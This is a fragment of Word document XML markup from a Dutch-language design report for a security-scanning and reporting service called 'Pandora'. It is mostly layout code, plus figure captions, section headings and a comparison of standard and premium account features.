                            <w:r>
                              <w:t>Figuur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4"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ACnPTSOAIAAGwEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAlM/hW4gAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4E20C143" w14:textId="00BF30D9" w:rsidR="00E2204E" w:rsidRPr="001C726A" w:rsidRDefault="00E2204E" w:rsidP="00A435BE">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.9</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41">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752CD4D6" w:rsidR="004A26CE" w:rsidRDefault="00B16854" w:rsidP="00435E58">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252350464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EAE82BF" wp14:editId="0A52DA1F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>41910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13462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0">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2244992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57A9D679" wp14:editId="53EE1F16">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-339726</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="10746740"/>
                <wp:effectExtent l="0" t="0" r="12065" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="566" name="Rectangle 566"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7557135" cy="10746740"/>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E2204E" w:rsidRDefault="00E2204E" w:rsidP="004A26CE"/>
                          <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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55" style="position:absolute;left:0;text-align:left;margin-left:-26.75pt;margin-top:-70.8pt;width:595.05pt;height:846.2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" fillcolor="#ffd966" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="271A1D0E" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="004A26CE"/>
                    <w:p w14:paraId="2FD96CDE" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="004A26CE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00435E58">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D55A7F" w14:textId="04459F6D" w:rsidR="004A26CE" w:rsidRPr="004A26CE" w:rsidRDefault="00B16854" w:rsidP="00435E58">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1180"/>
        </w:tabs>
        <w:sectPr w:rsidR="004A26CE" w:rsidRPr="004A26CE" w:rsidSect="00B16854">
          <w:headerReference w:type="first" r:id="rId42"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="535" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252254208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D8305E0" wp14:editId="721941B3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>109220</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>291338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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00CA4BC9" w:rsidRDefault="00E2204E"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56" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8.6pt;margin-top:229.4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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="065D94A9" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00435E58" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00CA4BC9" w:rsidRDefault="00E2204E" w:rsidP="006705F1"/>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2A03E29C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-17641</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>268478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B7A3" id="Rounded Rectangle 130" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1.4pt;margin-top:211.4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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A14BEE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252256256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4825A146" wp14:editId="2C26043E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>41910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1203325</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E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E">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57" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.3pt;margin-top:94.75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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="787C2EDC" w14:textId="7E5CBA09" w:rsidR="00E2204E" w:rsidRPr="00A14BEE" w:rsidRDefault="00E2204E">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sidR="00435E58">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C724CF" w14:textId="674B0C4D"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93796"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p>
    <w:p w14:paraId="25E8961C" w14:textId="4C165841" w:rsidR="00F35D5A" w:rsidRPr="00AD1E97" w:rsidRDefault="00AD1E97" w:rsidP="00AD1E97">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>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SecurityRapport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53F17E93" w14:textId="77777777" w:rsidR="00D03138" w:rsidRDefault="00D03138" w:rsidP="008A5336">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252351488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51402C40" wp14:editId="720F67A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-6985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>75755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D105" id="Rectangle 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.55pt;margin-top:59.6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" fillcolor="#ffd966" strokecolor="#bf8f00 [2407]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E2642C">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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E" w:rsidP="005776D0">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008F7930">
                              <w:t>Admin</w:t>
                            </w:r>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58"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lK+XsCAABk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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0173E4F7" w14:textId="50BFEF72" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E" w:rsidP="005776D0">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008F7930">
                        <w:t>Admin</w:t>
                      </w:r>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46"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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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59"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wBHsCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIWwpl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4912BA45" w14:textId="2546C6E1" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="008A0E3E" w:rsidRDefault="00E2204E">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60"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yeA3oCAABlBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI25UC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7GyeA3oCAABlBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAeTqkpd0AAAAKAQAA&#10;DwAAAAAAAAAAAAAAAADSBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1AA84A99" w14:textId="0D1B5880" w:rsidR="00E2204E" w:rsidRPr="008A0E3E" w:rsidRDefault="00E2204E">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7BE15BF3">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E2204E" w:rsidRPr="003F6932" w:rsidRDefault="00E2204E"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61"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5A3kCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7BF9B3F5" w14:textId="29AE856C" w:rsidR="00E2204E" w:rsidRPr="003F6932" w:rsidRDefault="00E2204E" w:rsidP="004B478D">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F6932">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Ondersteunende Componenten</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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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62"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NzP303sCAABkBQAA&#10;DgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAtpPJeN8AAAAL&#10;AQAADwAAAAAAAAAAAAAAAADTBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25D5C477" w14:textId="61810C78" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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63"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="36998011" w14:textId="52D20C53" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00F17F39" w:rsidRDefault="00E2204E">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64"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1e+ncCAABgBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtICxS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AVfV76dwIAAGAFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDIrLAb3wAAAAoBAAAP&#10;AAAAAAAAAAAAAAAAAM8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32E9FADE" w14:textId="5A5FE504" w:rsidR="00E2204E" w:rsidRPr="00F17F39" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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65"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B59963C" w14:textId="51E7E476" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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66"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1BBDD562" w14:textId="419B3284" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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67"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3992260D" w14:textId="3C9461C7" w:rsidR="00E2204E" w:rsidRPr="0045370F" w:rsidRDefault="00E2204E">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p>
    <w:p w14:paraId="7D8B3510" w14:textId="77A8ED3A" w:rsidR="00AD1E97" w:rsidRPr="008A5336" w:rsidRDefault="00D03138" w:rsidP="008A5336">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00AD1E97">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E09666" w14:textId="6A2CA6D6"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E5D82"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49">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26A1B12C" w:rsidR="002377B1" w:rsidRDefault="00D03138">
      <w:r>
        <w:tab/>
        <w:t>Figuur 4.2</w:t>
      </w:r>
    </w:p>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04620E4A"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A38E3">
              <w:t>CRUD)</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50F8EA6F"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w:t>
            </w:r>
            <w:r w:rsidR="002A38E3">
              <w:t>middel van een ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A8D3947" w14:textId="17477A77" w:rsidR="00110CAA" w:rsidRDefault="00D03138">
      <w:r>
        <w:t>Tabel 4.1</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lastRenderedPageBreak/>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50">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2907B"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2C31EB0B" w:rsidR="00357E59" w:rsidRPr="005136DA" w:rsidRDefault="00D03138" w:rsidP="005136DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figuur 4.3</w:t>
      </w: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D03138">
          <w:headerReference w:type="default" r:id="rId51"/>
          <w:headerReference w:type="first" r:id="rId52"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1012" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00773B77">
        <w:t>Het verzenden en beheren van rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55434D39" w14:textId="67E8FC60" w:rsidR="006E3A79" w:rsidRDefault="007533C4" w:rsidP="007533C4">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59071"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ordPress</w:t>
      </w:r>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r w:rsidR="00245DE9">
        <w:t>client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E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00D25B17" w:rsidRDefault="00E2204E"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68"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1457BC19" w14:textId="5E30647D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00D25B17" w:rsidRDefault="00E2204E"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27101"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E2204E" w:rsidRPr="00A62C51" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00A62C51" w:rsidRDefault="00E2204E"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69"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="172A6A7B" w14:textId="5143B205" w:rsidR="00E2204E" w:rsidRPr="00A62C51" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00A62C51" w:rsidRDefault="00E2204E"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DADE8"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16BCA352" w:rsidR="00D25B17" w:rsidRPr="008D3D82" w:rsidRDefault="00271FB5" w:rsidP="00D9450D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252393472" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C21B522" wp14:editId="686D555C">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5EA0"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E2204E" w:rsidRPr="000B458C" w:rsidRDefault="00E2204E"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70"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Qy59L3kCAABjBQAADgAA&#10;AAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA9Qgtk94AAAALAQAA&#10;DwAAAAAAAAAAAAAAAADRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANwFAAAAAA==&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="04CAB098" w14:textId="31F26C89" w:rsidR="00E2204E" w:rsidRPr="000B458C" w:rsidRDefault="00E2204E" w:rsidP="000B458C">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Pandora Accounts</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC16E6" w14:textId="5DD250A9" w:rsidR="00271FB5" w:rsidRDefault="00E07DCD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252398592" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C11F8C4" wp14:editId="4AF3D2CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3101527</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>7773857</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E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Premiumaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle scan opties</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2EFDB13B" w14:textId="2416F284" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alle rapport types</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="675E34A8" w14:textId="1F62717F" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="19"/>
                              </w:numPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004E4312">
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Alternatie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71" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:244.2pt;margin-top:612.1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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20576F7A" w14:textId="7E4A92BC" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Premiumaccount</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0597E4E9" w14:textId="5584EBFD" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alle scan opties</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2EFDB13B" w14:textId="2416F284" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alle rapport types</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="675E34A8" w14:textId="1F62717F" w:rsidR="00E2204E" w:rsidRPr="004E4312" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="19"/>
                        </w:numPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004E4312">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Alternatie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5DF8C6FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-13335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>777494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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Standaardaccount</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="00E2204E" w:rsidRPr="00F97E77" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00F97E77" w:rsidRDefault="00E2204E"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72" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1.05pt;margin-top:612.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3E6864C3" w14:textId="38E84A5A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Standaardaccount</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="37F1215A" w14:textId="65A91B93" w:rsidR="00E2204E" w:rsidRPr="00F97E77" w:rsidRDefault="00E2204E"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E2204E" w:rsidRPr="00F97E77" w:rsidRDefault="00E2204E"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52B2"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241096">
          <w:headerReference w:type="default" r:id="rId53"/>
          <w:headerReference w:type="first" r:id="rId54"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C00AC50" w14:textId="42E47B8A" w:rsidR="00A754AF" w:rsidRDefault="0075098B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253200384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5508F16E" wp14:editId="05851286">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>8366125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6478905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="786" name="Text Box 786"/>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39508" w14:textId="3AAB3733" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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F16E" id="Text Box 786" o:spid="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:658.75pt;margin-top:510.15pt;width:70pt;height:27.4pt;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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37539508" w14:textId="3AAB3733" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.6</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
